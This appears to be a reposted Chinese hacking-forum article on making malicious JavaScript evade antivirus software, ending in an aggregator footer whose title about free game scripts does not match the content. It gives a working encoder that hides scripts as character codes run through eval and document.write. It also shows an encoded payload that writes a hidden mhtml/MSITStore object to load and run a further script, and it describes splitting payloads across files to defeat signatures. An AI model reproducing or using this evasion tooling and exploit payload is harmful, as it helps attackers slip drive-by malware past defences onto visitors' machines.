js腳本免殺工具 免殺經驗以及簡單的分析

文章作者：蟲蟲
信息來源：邪惡八進制信息安全團隊（www.eviloctal.com）

本文所做的實驗是以ah.js(冰狐的一個變種,附件中名為”病毒樣本.txt”)為病毒樣本進行的,其他js惡意代碼沒有測試。
由于卡巴斯基對js的查殺力度比較大，再者我本機就安裝了卡巴斯基，所以對其有少量額外的分析。
菜鳥作品，難登大雅之堂，高手多多指教！ ^-^

常規的思路就是將js編碼以后使殺毒軟件找不到特征碼所以不報。本實驗也是循了這一思路,所以并沒有多少創新的地方。(要有創新點的話,后半部分的一個技巧可能算是一個.呵呵)
于是將js文件拆成幾片，看看特征碼在什么地方，然后修改。ccl不能拆開非pe文件，也不適合，所以都是手動來的。
但一開始我并沒有這么做，我使用escape函數將這個js編碼了,使用的時候再用unescape變回來,于是寫了代碼,但測試失敗!(也許其他的殺毒監測不出來,但是卡巴不會)
想可能特征碼還存在,于是將原文件每一個字符的ASCII讀出來，然后再用String.fromCharCode編回來,這樣肯定就不會有特征碼了,因為只有一串串的數字,于是很得意的這么做了,然而,很意外的,卡巴馬上把這個文件殺了!!!!

相當意外,難道卡巴是動態跟蹤的?于是把病毒樣本里的變量名換了,被殺!!難道他動態的監視每一個變量,一旦發現變量中有非法內容馬上查殺?!再結合第一次實驗,我幾乎就確定是這么回事了,但是下面的實驗又讓我意外:

把病毒樣本里的變量名換了,然后加入了幾個中間變量,本來等待被卡巴殺掉,但是卡巴卻把它放行了(附件中的 樣本直接變形.txt).

于是重新思考了.[各位和我一樣的小菜菜也一起想一下吧,高手莫笑]

卡巴斯基并沒有那么智能去動態的跟蹤每一個變量,他可能只是內嵌了一個腳本分析器,可以分析簡單的腳本編碼,所以以上的幾個實驗會有被殺的結果.然后卡巴也是特征碼驅動的,于是, 樣本直接變形.txt 會被放行.

這個思路的直接產物就是:附件中的”js變形免殺”這個東東,因為簡單編碼并不會繞過卡巴,但是將源碼稍微改動后卻可以通過.如果將二者結合一下呢？ js變形免殺 就這么做的。大家可以看看他的代碼。附件中還有他變形后的ah.js的代碼”生成樣本1.js”
呵呵,不要高興,他被卡巴殺了,呵呵. 但是江民會放過他 (附件中有一個各類殺毒比較)

變形不夠吧?于是寫了 js變形免殺2 ,終于繞過了卡巴. 根據我以上的思路認為其他的惡意js通過這個工具變形后均可以免殺，但我沒有做相關的測試，也希望看到這里的各位拿去測試一下，謝謝！

寫的好啰嗦阿！！當作稿件發倒是能多賺點。呵呵。
下面是我覺得有點創新的地方。也是在測定特征碼位置的時候想到的。
看一下附件的 js分片卡巴檢測 ，發現了什么？呵呵

還是那個：將js文件拆成幾片，看看特征碼在什么地方，然后修改。由的時候拆成幾片后都不報毒了，郁悶，得重新湊，因為把特征碼拆開了，檢測不到了。哈哈，猜到了吧？
我就把這幾片分開來放，然后再另一個文件里使用
<script src=piece1.js></script>
<script src=piece2.js></script>
<script src=piece3.js></script>
把他們合起來～～～很有意思的繞過了殺毒～（附件有說明）

其實asp也可以阿，include不是嗎？

好了，很啰嗦,寫點什么時總要發揮投稿時1句話分5句說的精神~~哎~~

asp馬的免殺呢?完全可以照上面的思路.但是我卻沒有寫出對應的工具~自己勞動一下吧~

[個人感覺asp馬的危害比js大（為什么？呵呵）,所以只把js變形器給出了……js免殺，他調用的馬可不一定免殺呶~]

為防止被殺毒查殺了,附件是加密的,密碼是 est

增加:對附件代碼的一點點提示
這是附件中對JS進行編碼的核心代碼:

CODE: function change(){

var s=new String(document.all.txt.value);

var t=new String;

var i;

for (i=0;i<s.length;i++ ){

t=t+(s.charCodeAt(i).toString())+”,”;}

t=t.substr(t,t.length-1)

t=’t=”‘+t+'”;/nt=eval(“String.fromCharCode(“+t+”)”);/ndocument.write(“<script>”+t+”<///script>”);’;

document.all.txt.value=t;}

</script> [Copy to clipboard]

這是使用該工具生成的一段代碼:

CODE: t=”71,73,70,56,57,97,32,13,10,118,97,114,32,71,73,70,56,57,97,61,100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,46,104,114,101,102,59,71,73,70,56,57,97,61,71,73,70,56,57,97,46,115,117,98,115,116,114,105,110,103,40,48,44,71,73,70,56,57,97,46,108,97,115,116,73,110,100,101,120,79,102,40,39,47,39,41,41,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,79,66,74,69,67,84,32,87,105,100,116,104,61,48,32,72,101,105,103,104,116,61,48,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,32,116,121,112,101,61,34,116,101,120,116,47,120,45,115,99,114,105,112,116,108,101,116,34,32,100,97,116,97,61,34,109,107,58,37,52,48,77,83,73,84,83,116,111,114,101,37,51,65,109,104,116,109,108,37,51,65,99,37,51,65,92,92,37,50,69,109,104,116,37,50,49,39,43,71,73,70,56,57,97,43,39,37,50,102,49,46,106,115,58,58,47,37,50,51,34,62,60,47,79,66,74,69,67,84,62,39,41,59″;

t=eval(“String.fromCharCode(“+t+”)”);

document.write(“<script>”+t+”<//script>”); [Copy to clipboard]

看起來其實也沒有什么,就是將原來的js給變成ascii碼，然后再用String.fromCharCode編回來。
但是這樣一編將不同格式的，不同特征字的js代碼變成了格式相同，特征字相似的js代碼，使得生成的js的免殺修改特別方便，也方便了使用后面的js分片技巧來免殺，這是一點；
其次，你不覺得這個代碼有點類似于exe文件的加殼嗎？我們用工具將原js編碼，然后通過轉換以后再使用document.write(“<script>”+t+”<//script>”)使其恢復活性，很像是吧。本來打算把這個展開來分析一下，但是仔細考慮了一下發現這個好像沒有很大的用途，最多用于保護代碼~和免殺。asp也可以通過使用eval和execute來加殼一下，呵呵。（asp方面可以使勁考慮下阿，你可能 會有一個很大的發現啊！）

我也說了這個文章并沒有什么技術性，實用性也不是很高。權當拿出來開拓開拓思路，高手莫笑，呵呵。

Code:

<title>蟲蟲的js變形工具</title>
<script>
function change(){

var s=new String(document.all.txt.value);
var t=new String;
var i;
for (i=0;i<s.length;i++ ){

t=t+(s.charCodeAt(i).toString())+”,”;}
t=t.substr(t,t.length-1)
t=’t=”‘+t+'”;/nt=eval(“String.fromCharCode(“+t+”)”);/ndocument.write(“<script>”+t+”<///script>”);’;
document.all.txt.value=t;}
</script>

<body style=”font-size:12px;”>
<center>
<span style=”font-size:20px;color:red;”>蟲蟲的JS變形工具</span><br>
將js的內容（不包含< script>標簽）復制到下面的文本框中，點變形即可。
<textarea id=txt cols=80 rows=30></textarea><br>
<button οnclick=change()>變形</button>
</center>
</body>

總結

以上是生活随笔為你收集整理的明日之后js免费脚本_超强免杀工具(网易《明日之后》官方网站)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。